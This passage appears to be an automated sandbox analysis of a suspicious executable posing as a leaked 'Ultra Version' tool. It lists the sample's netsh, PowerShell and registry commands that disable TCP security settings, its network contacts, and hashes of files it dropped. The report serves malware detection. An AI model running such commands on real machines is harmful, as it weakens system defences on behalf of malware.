netsh int tcp set global nonsackrttresiliency=disabled

C:\Windows\system32\netsh.exe

netsh int tcp set security mpp=disabled

C:\Windows\system32\netsh.exe

netsh int tcp set security profiles=disabled

C:\Windows\system32\netsh.exe

netsh int ip set global icmpredirects=disabled

C:\Windows\system32\netsh.exe

netsh int tcp set security mpp=disabled profiles=disabled

C:\Windows\system32\netsh.exe

netsh int ip set global multicastforwarding=disabled

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell Disable-NetAdapterLso -Name "*"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=760 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell "ForEach($adapter In Get-NetAdapter){Disable-NetAdapterPowerManagement -Name $adapter.Name -ErrorAction SilentlyContinue}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell "ForEach($adapter In Get-NetAdapter){Disable-NetAdapterLso -Name $adapter.Name -ErrorAction SilentlyContinue}"

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "EnableICMPRedirect" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "EnablePMTUDiscovery" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "Tcp1323Opts" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "TcpMaxDupAcks" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "TcpTimedWaitDelay" /t REG_DWORD /d "32" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "GlobalMaxTcpWindowSize" /t REG_DWORD /d "8760" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "TcpWindowSize" /t REG_DWORD /d "8760" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "MaxConnectionsPerServer" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "MaxUserPort" /t REG_DWORD /d "65534" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "SackOpts" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "DefaultTTL" /t REG_DWORD /d "64" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "NetworkThrottlingIndex" /t REG_SZ /d "ffffffff" /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5084 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.135.233:443 cdn.discordapp.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 business.bing.com udp
US 8.8.8.8:53 business.bing.com udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 13.107.6.158:443 business.bing.com tcp
GB 172.165.61.93:443 nav-edge.smartscreen.microsoft.com tcp
GB 172.165.61.93:443 nav-edge.smartscreen.microsoft.com tcp
US 8.8.8.8:53 bzib.nelreports.net udp
US 8.8.8.8:53 bzib.nelreports.net udp
GB 104.91.71.133:443 bzib.nelreports.net tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 233.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 158.6.107.13.in-addr.arpa udp
US 8.8.8.8:53 133.71.91.104.in-addr.arpa udp
GB 2.17.5.133:443 www.microsoft.com tcp
US 8.8.8.8:53 dl-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 dl-edge.smartscreen.microsoft.com udp
GB 172.165.69.228:443 dl-edge.smartscreen.microsoft.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 133.5.17.2.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 228.69.165.172.in-addr.arpa udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 8.8.8.8:53 c.s-microsoft.com udp
US 8.8.8.8:53 c.s-microsoft.com udp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 45.19.74.20.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 20.42.73.29:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 29.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 13.107.246.64:443 wcpstatic.microsoft.com tcp
GB 92.123.128.149:443 www.bing.com tcp
US 8.8.8.8:53 149.128.123.92.in-addr.arpa udp
US 13.107.246.64:443 wcpstatic.microsoft.com tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
US 13.107.246.64:443 edge-mobile-static.azureedge.net tcp
US 8.8.8.8:53 134.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
IE 94.245.104.56:443 api.edgeoffer.microsoft.com tcp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
GB 13.87.96.169:443 nav-edge.smartscreen.microsoft.com tcp
US 8.8.8.8:53 56.104.245.94.in-addr.arpa udp
US 8.8.8.8:53 169.96.87.13.in-addr.arpa udp
US 8.8.8.8:53 blank-pd24u.in udp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 13.107.246.64:443 edge-consumer-static.azureedge.net tcp
US 8.8.8.8:53 187.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 142.250.200.42:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 42.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 90.16.208.104.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 cd67ca4d88d40fbdc3fe1a395f98a8bc
SHA1 cfc0ab8e240ceeb0b41b66ec87c5aa22bee69a6a
SHA256 0b2c4c3de72fdbe44f3659da4f6ab476782bf7d256548d6cd0731912285d24d8
SHA512 cdd8fb31ad56b058f2272bcf14516f5fa9d9ceb3e2223a54e490ed5854af21080ad66753b2bcd9600bafe09923b45434bd6a263e662468f7a4136ab1115fd8e9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 9ae8e22e33a364417baa518871fa12b2
SHA1 0c85298bd65104351f836ac6d9a864f9f67f5340
SHA256 0528696653e86f522afd4052c9e2199a68ac37d4696f26630d235bbcc3f456c7
SHA512 55546aa6b9788c92cab046a4e3310d0ddda898e1caf2f8b463e1e01a9ef312c84e169222a2df5f1670ae6361043428350769dd8a702c214427457fec87fb74fa

\??\pipe\crashpad_3704_CYQSTATVKZCNFFYD

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 1698e1120853544014c2c544442c8460
SHA1 7b7ba208c30a35877e7f701dfb5f6c0b18051d8a
SHA256 ab8f567d01c89445b79aac419d903341218e00f6d23b7f6dfcedb3f4ae50ce4e
SHA512 475d1b0908f57ada5d3ed41b70f04e762f913c0985226c870cdca05e5a614eeb61e76d46dc97e806637af4bf9ceff0864e94a5740cfa674af6f91b6f7894a2c8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c1afed0d0e0f93b545789393104793e0
SHA1 b9ed8d1b04026bfdbd19946161ebb1060c8292cb
SHA256 78d1a29ec3454828248eb2a01016deba629a87a969fdd68ca87f81651f5c77d2
SHA512 c7b6e81cbb699da7eda5087eccf948fdbfa024f33e7160f01a1706c5466b232d91c5fd0a769ca41c0619821f475e2554be9f0f28c788d9948e925fb463ee5aef

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

MD5 20d4b8fa017a12a108c87f540836e250
SHA1 1ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA256 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe

MD5 5c8fc4049f875577ac6722806184391c
SHA1 f23617e724154cb34604149f296b8e7563d8d2c7
SHA256 a6d6b6adfcb46e203c7ec8684f343d533097291723dd375890351e5d1e39b204
SHA512 5087b04a7665819efc8380b96b392f0aa23ac38a11e1e4713a782d178571328f912352e4dd2bf1b5ecb3afe1aa1a971477aeb8c16a01580983bc9eec800b4b9e

C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe

MD5 649b38a3433d7ae4bd11a5de40e71ab6
SHA1 a4847bb6b9203354c3f39250897b557e55b59df4
SHA256 b7a04367704dca447f089fb3bca0aa1a36d2d930bfc524d399a57f125e46f8c4
SHA512 57a5c66197e95e97ad47acfa4688c30e0d5f75af12d3552054d71d336c9b4788e9cc86351cc2317c5760de0d9a8cf9f9e75c1cbf0492ca018b471220f4d55ad5

C:\Users\Admin\AppData\Local\Temp\_MEI17362\ucrtbase.dll

MD5 8e7680a8d07c3c4159241d31caaf369c
SHA1 62fe2d4ae788ee3d19e041d81696555a6262f575
SHA256 36cc22d92a60e57dee394f56a9d1ed1655ee9db89d2244a959005116a4184d80
SHA512 9509f5b07588a08a490f4c3cb859bbfe670052c1c83f92b9c3356afa664cb500364e09f9dafac7d387332cc52d9bb7bb84ceb1493f72d4d17ef08b9ee3cb4174

C:\Users\Admin\AppData\Local\Temp\_MEI17362\python310.dll

MD5 01988415e8fb076dcb4a0d0639b680d9
SHA1 91b40cffcfc892924ed59dc0664c527ff9d3f69c
SHA256 b101db1ddd659b8d8ffd8b26422fde848d5b7846e0c236f051fadb9412de6e24
SHA512 eab0c3ca4578751a671beb3da650b5e971a79798deb77472e42f43aa2bea7434ad5228a8fddbfff051ce05054dbf3422d418f42c80bc3640e0e4f43a0cf2ebbe

C:\Users\Admin\AppData\Local\Temp\_MEI17362\python310.dll

MD5 4e02de9a0e676fb8f740fc047a04a5ca
SHA1 f96328455f7966ffd6926dc450882083afdc624d
SHA256 e9aa0dc8f9c8b79013337c9a67c496454337e0ff3557074709fb2806093d2c7d
SHA512 253ebbb93e59e315e06bde92ca83976b48a99f6a7619020fb453edf72808cf07fcbef3cf1090377011ab84c12c66972a6a27d79f4b2f877cfd2dc41a2f73a1c6

C:\Users\Admin\AppData\Local\Temp\_MEI17362\VCRUNTIME140.dll

MD5 6c1f9732533e4623a6cd0af49f7b40fa
SHA1 7d26b539ef7becf120c4306c9fa21a26e71203e0
SHA256 16d99b5afc24638508b51acf60a5b5e1492d1deda620ef7c79baef4791340ab7
SHA512 360d3c38f07189711aaa9679db21e56cb729b9f81c642363dde3543570edec4c162e4457f4d6531fe47248f7f5ee71eb116c523c3233b81ee183f65cc986afc9

C:\Users\Admin\AppData\Local\Temp\_MEI17362\VCRUNTIME140.dll

MD5 f12681a472b9dd04a812e16096514974
SHA1 6fd102eb3e0b0e6eef08118d71f28702d1a9067c
SHA256 d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8
SHA512 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

memory/2812-159-0x00007FF9D3730000-0x00007FF9D3B9E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI17362\base_library.zip

MD5 b71c1e073b7a1bb2e4f87767eb17bf63
SHA1 452cebd6aff011e96f36c600bbc46ef18f2d8996
SHA256 927b335f7088b8a9f8509f99e59e5a86435a4a691a85a889a5bc6833a3a3381e
SHA512 11147deaffe0a1bbe3702da0a771cf32245adbedd10543542f49aae124638b5c9facdacfb216825544e2e985cba43eabe6f52404bd6e792b65719ad30e1d683b

C:\Users\Admin\AppData\Local\Temp\_MEI17362\libffi-7.dll

MD5 6f818913fafe8e4df7fedc46131f201f
SHA1 bbb7ba3edbd4783f7f973d97b0b568cc69cadac5
SHA256 3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56
SHA512 5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639

C:\Users\Admin\AppData\Local\Temp\_MEI17362\_ctypes.pyd

MD5 b3a39eab934c679cae09c03e61e44d3f
SHA1 e3d7e9770089de36bc69c8527250dbfac51367b7
SHA256 083fd5b8871869fb5571046e1c5336b0ca9b6e8dbc3d00983d81badd28a46ee2
SHA512 5704b9618e1a3750145e7e735890b646cf4cd0793a23628d2e70a263cd8bd77b12b55f3b9cb7f0b40da402507db994403e8d9fecb69f01865a3c56c6456c5cb6

C:\Users\Admin\AppData\Local\Temp\_MEI17362\libssl-1_1.dll

MD5 eac369b3fde5c6e8955bd0b8e31d0830
SHA1 4bf77158c18fe3a290e44abd2ac1834675de66b4
SHA256 60771fb23ee37b4414d364e6477490324f142a907308a691f3dd88dc25e38d6c
SHA512 c51f05d26fda5e995fe6763877d4fcdb89cd92ef2d6ee997e49cc1ee7a77146669d26ec00ad76f940ef55adae82921dede42e55f51bd10d1283ecfe7c5009778

C:\Users\Admin\AppData\Local\Temp\_MEI17362\libcrypto-1_1.dll

MD5 daa2eed9dceafaef826557ff8a754204
SHA1 27d668af7015843104aa5c20ec6bbd30f673e901
SHA256 4dab915333d42f071fe466df5578fd98f38f9e0efa6d9355e9b4445ffa1ca914
SHA512 7044715550b7098277a015219688c7e7a481a60e4d29f5f6558b10c7ac29195c6d5377dc234da57d9def0c217bb3d7feca332a64d632ca105503849f15e057ea

memory/2812-209-0x00007FF9E7750000-0x00007FF9E775F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI17362\bound.blank

MD5 a4bfe9de2681015f065ae0586655acc3
SHA1 5a02ca8b34a13183645a69eee58322a5af3550f2
SHA256 36853379ee9f7d3d0f89847cf0af2e8973d32567092ac87f01957de6df283ee5
SHA512 7a2a997e0c516d35b003667af799a9c7d2b0bd423767ebcde7bbef0b3b208588142a699f6dc99ba7b26f61d1889bbb1e75591aacf3d63ede6db6426d861fab79

C:\Users\Admin\AppData\Local\Temp\_MEI17362\blank.aes

MD5 ec181af3bd731f7aca757ce598e00f7d
SHA1 b37d236d9311313415a27c57c30dc2ad302bd9b1
SHA256 8c2e6c00370114c9104a9a835a85228786b49ad0e2c02f3bc6e4988482a1e849
SHA512 cc13ae289ded603a7a260989136fae84382fca811a892e1fab74a5638915b00e69bf05da9135f483e80c9d0816931d63e968c9e3d33ccd1a0bc2daba0b57a1c8

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-crt-utility-l1-1-0.dll

MD5 26f020c0e210bce7c7428ac049a3c5da
SHA1 7bf44874b3ba7b5ba4b20bb81d3908e4cde2819c
SHA256 dfad88b5d54c597d81250b8569f6d381f7016f935742ac2138ba2a9ae514c601
SHA512 7da07143cab0a26b974fa90e3692d073b2e46e39875b2dd360648382d0bfca986338697600c4bc9fe54fc3826daa8fc8f2fec987de75480354c83aba612afa5f

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-crt-time-l1-1-0.dll

MD5 b64b9e13c90f84d0b522cd0645c2100c
SHA1 39822cb8f0914a282773e4218877168909fdc18d
SHA256 2f6b0f89f4d680a9a9994d08aa5cd514794be584a379487906071756ac644bd6
SHA512 9cb03d1120de577bdb9ed720c4ec8a0b89db85969b74fbd900dcdc00cf85a78d9469290a5a5d39be3691cb99d49cf6b84569ac7669a798b1e9b6c71047b350de

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-crt-string-l1-1-0.dll

MD5 5a82c7858065335cad14fb06f0465c7e
SHA1 c5804404d016f64f3f959973eaefb7820edc97ad
SHA256 3bf407f8386989aa5f8c82525c400b249e6f8d946a32f28c469c996569d5b2e3
SHA512 88a06e823f90ef32d62794dafe6c3e92755f1f1275c8192a50e982013a56cf58a3ba39e2d80b0dd5b56986f2a7d4c5b047a75f8d8f4b5b241cdf2d00beebd0d5

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-crt-stdio-l1-1-0.dll

MD5 844e18709c2deda41f2228068a8d2ced
SHA1 871bf94a33fa6bb36fa1332f8ec98d8d3e6fe3b6
SHA256 799e9174163f5878bea68ca9a6d05c0edf375518e7cc6cc69300c2335f3b5ea2
SHA512 3bbb82d79f54d85dcbe6ee85a9909c999b760a09e8925d704a13ba18c0a610a97054ac8bd4c66c1d52ab08a474eda78542d5d79ae036f2c8e1f1e584f5122945

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-crt-runtime-l1-1-0.dll

MD5 83433288a21ff0417c5ba56c2b410ce8
SHA1 b94a4ab62449bca8507d70d7fb5cbc5f5dfbf02c
SHA256 301c5418d2aee12b6b7c53dd9332926ce204a8351b69a84f8e7b8a1344fa7ea1
SHA512 f20de6248d391f537dcc06e80174734cdd1a47dc67e47f903284d48fb7d8082af4eed06436365fce3079aac5b4e07bbd9c1a1a5eb635c8fe082a59f566980310

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-crt-process-l1-1-0.dll

MD5 e62a28c67a222b5af736b6c3d68b7c82
SHA1 2214b0229f5ffc17e65db03b085b085f4af9d830
SHA256 bd475e0c63ae3f59ea747632ab3d3a17dd66f957379fa1d67fa279718e9cd0f4
SHA512 2f3590d061492650ee55a7ce8e9f1d836b7bb6976ae31d674b5acf66c30a86a5c92619d28165a4a6c9c3d158bb57d764ee292440a3643b4e23cffcdb16de5097

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-crt-math-l1-1-0.dll

MD5 ccf0a6129a16068a7c9aa3b0b7eeb425
SHA1 ea2461ab0b86c81520002ab6c3b5bf44205e070c
SHA256 80c09eb650cf3a913c093e46c7b382e2d7486fe43372c4bc00c991d2c8f07a05
SHA512 d4f2285c248ace34ea9192e23b3e82766346856501508a7a7fc3e6d07ee05b1e57ad033b060fe0cc24ee8dc61f97757b001f5261da8e063ab21ee80e323a306e

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-crt-locale-l1-1-0.dll

MD5 a404e8ecee800e8beda84e8733a40170
SHA1 97a583e8b4bbcdaa98bae17db43b96123c4f7a6a
SHA256 80c291e9fcee694f03d105ba903799c79a546f2b5389ecd6349539c323c883aa
SHA512 66b99f5f2dcb698137ecbc5e76e5cf9fe39b786ea760926836598cabbfa6d7a27e2876ec3bf424a8cbb37e475834af55ef83abb2ed3c9d72c6a774c207cff0e0

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-crt-heap-l1-1-0.dll

MD5 841cb7c4ba59f43b5b659dd3dfe02cd2
SHA1 5f81d14c98a7372191eceb65427f0c6e9f4ed5fa
SHA256 2eafce6ff69a237b17ae004f1c14241c3144be9eaeb4302fdc10dd1cb07b7673
SHA512 f446acb304960ba0d262d8519e1da6fe9263cc5a9da9ac9b92b0ac2ce8b3b90a4fd9d1fdfe7918b6a97afe62586a36abd8e8e18076d3ad4ad77763e901065914

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-crt-filesystem-l1-1-0.dll

MD5 a5dce38bc9a149abe5d2f61db8d6cec0
SHA1 05b6620f7d59d727299de77abe517210adea7fe0
SHA256 a5b66647ee6794b7ee79f7a2a4a69dec304daea45a11f09100a1ab092495b14b
SHA512 252f7f841907c30ff34aa63c6f996514eb962fc6e1908645da8bbde137699fe056740520fee6ad9728d1310261e6e3a212e1b69a7334832ce95da599d7742450

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-crt-environment-l1-1-0.dll

MD5 0eeb09c06c6926279484c3f0fbef85e7
SHA1 d074721738a1e9bb21b9a706a6097ec152e36a98
SHA256 10eb78864ebff85efc91cc91804f03fcd1b44d3a149877a9fa66261286348882
SHA512 3ceb44c0ca86928d2fdd75bf6442febafaca4de79108561e233030635f428539c44faae5bcf12ff6aa756c413ab7558ccc37eef8008c8aa5b37062d91f9d3613

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-crt-convert-l1-1-0.dll

MD5 d66741472c891692054e0bac6dde100b
SHA1 4d7927e5bea5cac77a26dc36b09d22711d532c61
SHA256 252b14d09b0ea162166c50e41aea9c6f6ad8038b36701981e48edff615d3ed4b
SHA512 c5af302f237c436ac8fe42e0e017d9ed039b4c6a25c3772059f0a6929cba3633d690d1f84ab0460beb24a0704e2e1fe022e0e113780c6f92e3d38d1afa8cee95

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-crt-conio-l1-1-0.dll

MD5 19876c0a273c626f0e7bd28988ea290e
SHA1 8e7dd4807fe30786dd38dbb0daca63256178b77c
SHA256 07fda71f93c21a43d836d87fee199ac2572801993f00d6628dba9b52fcb25535
SHA512 cdd405f40ac1c0c27e281c4932fbbd6cc84471029d7f179ecf2e797b32bf208b3cd0ca6f702bb26f070f8cdd06b773c7beb84862e4c01794938932146e74f1ca

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-core-util-l1-1-0.dll

MD5 7a75bc355ca9f0995c2c27977fa8067e
SHA1 1c98833fd87f903b31d295f83754bca0f9792024
SHA256 52226dc5f1e8cd6a22c6a30406ed478e020ac8e3871a1a0c097eb56c97467870
SHA512 ba96fdd840a56c39aaa448a2cff5a2ee3955b5623f1b82362cb1d8d0ec5fbb51037bdc9f55fe7b6c9f57932267e151e167e7f8d0cb70e907d03a48e0c2617b5b

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-core-timezone-l1-1-0.dll

MD5 acf40d5e6799231cf7e4026bad0c50a0
SHA1 8f0395b7e7d2aac02130f47b23b50d1eab87466b
SHA256 64b5b95fe56b6df4c2d47d771bec32bd89267605df736e08c1249b802d6d48d1
SHA512 f66a61e89231b6dc95b26d97f5647da42400bc809f70789b9afc00a42b94ea3487913860b69a1b0ee59ed5eb62c3a0cade9e21f95da35fdd42d8ce51c5507632

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-core-sysinfo-l1-1-0.dll

MD5 7b997bd96cb7fa92dee640d5030f8bea
SHA1 ee258d5f6731778363aa030a6bc372ca9a34383c
SHA256 4bcd366eaf0bde99b472fa2bf4e0dda1d860b3f404019fb41bbb8ad3a6d4d8f2
SHA512 92b9f4dd0b8cc66a92553418a1e18bbbee775f4051cd49af20505151be20b41db11d42c7f2436a6fa57e4c55f55a0519a1960e378f216ba4d7801e2efb859b2a

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-core-synch-l1-2-0.dll

MD5 5e393142274d7589ad3df926a529228c
SHA1 b9ca32fcc7959cb6342a1165b681ad4589c83991
SHA256 219cc445c1ad44f109219a3bb6900ab965cb6357504fc8110433b14f6a9b57be
SHA512 5eb31be9bce51a475c18267d89ee7b045af37b9f0722baaa85764114326c7a8d0a1662135e102d7ac074c24a6035232a527fc8745139a26cb62f33913ace3178

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-core-synch-l1-1-0.dll

MD5 f378455fb81488f5bfd3617e3c5a75c0
SHA1 312fa1343498e99565b1fbf92e6e1e05351cbc99
SHA256 91e50f94a951aa4e48a9059ad222bbe132b02e83d4a7df94a35ea73248e84800
SHA512 11d80d4f58da3827a317a3c1ed501432050e123eb992ed58c7765c68ddd2fc49b04398149e73fdb9fb3aa4494b440333aa26861b796e7ae8c7ad730f4faf99f7

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-core-string-l1-1-0.dll

MD5 6e5da9819bd53dcb55abde1da67f3493
SHA1 8562859ebf3ce95f7ecb4e2c785f43ad7aaaf151
SHA256 30dc0deb0faf0434732f2158ad24f2199def8dd04520b9daabbc5f0b3b6ddf40
SHA512 75eb227ca60ff8e873dac7fa3316b476b967069e8f0ac31469b2de5a9b21044db004353febf2b53069392be10a8bf40563bb5d6d4be774d37d12cf6fbeced175

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-core-rtlsupport-l1-1-0.dll

MD5 2aa1f0c20dfb4586b28faf2aa16b7b00
SHA1 3c4e9c8fca6f24891430a29b155876a41f91f937
SHA256 d2c9ee6b1698dfe99465af4b7358a2f4c199c907a6001110edbea2d71b63cd3f
SHA512 ae05338075972e258bcf1465e444c0a267ad6f03fbb499f653d9d63422a59ac28f2cb83ec25f1181699e59ecbaac33996883e0b998cbade1cc011bc166d126d0

C:\Users\Admin\AppData\Local\Temp\_MEI17362\api-ms-win-core-profile-l1-1-0.dll

MD5 051847e7aa7a40a1b081ff4b79410b5b
SHA1 4ca24e1da7c5bb0f2e9f5f8ce98be744ea38309e
